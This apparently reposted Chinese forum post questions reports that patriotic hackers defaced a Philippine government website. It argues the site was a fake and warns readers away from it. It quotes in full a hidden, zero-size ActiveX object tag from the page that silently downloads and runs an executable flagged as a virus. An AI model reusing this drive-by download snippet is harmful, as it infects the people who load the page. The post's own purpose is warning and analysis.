zidaneyangyang zidaneyangyang
关注数: 28 粉丝数: 1,479 发帖数: 8,298 关注贴吧数: 23
【纯属转载】菲律宾官网被黑?请注意,红客攻击菲官网有猫腻。 疑点1 分享新闻网进行了GOOGLE搜索和百度搜索,发现没有任何搜索引擎以前的收录记录,试想一个国家的网站,访问量应该很大,而且从这个网站运作,应该就被搜索引擎收录过,分享新闻网发现了上次快照更新时间已经是昨天了。那么,一个国家的机要网站,在发现自己被黑后一天都没人处理,难道他们国家没有技术人员了吗???? 疑点2 分享新闻网通过查询了源代码和主机地址,发现网站http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Flamitan.gov.ph%2F&urlrefer=d03204a5dd15e86e83fe957cf164559b服务器放置地在美国。然后该网站还被挂了马。试想自己黑了给那么多华人看,攻击的人需要挂马害自己人吗,显示这个事情有猫腻。我们查看了源文件,发现了这样一段代码。 <BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.sulu.gov.ph%2Fadmin%2Fcal%2F135pk.exe&urlrefer=044f271e67035c305ea5a053964c649d"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html> 疑点3 分享新闻网小编下载了这个135pk.exe文件 上传到了查毒网,全部显示为病毒。而且如果是菲律宾官方挂的,也不用自动隐藏下载打开吧,文件有350KB 也不像是什么插件之类的。攻击的网站也不是菲律宾政府官网,而真正的官网应该是:http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww..gov.ph%2F&urlrefer=a194316c564a656fdb7d4bc08f8e6e1f 然后我们在网上查到了.ph的菲律宾域名80元即可注册购买,因此。该事件在没有得到论证以前请没有经验的用户不要去打开。被钓鱼就麻烦了以上三个疑点说明 有人故意做了假网站,跟随菲律宾能源网站被黑一事在自己谋利。谋什么利呢 ,我们进群发现群管理不断发内容招人。招学员之类的。这个.....不用继续往下说了吧......
首页 1 2 下一页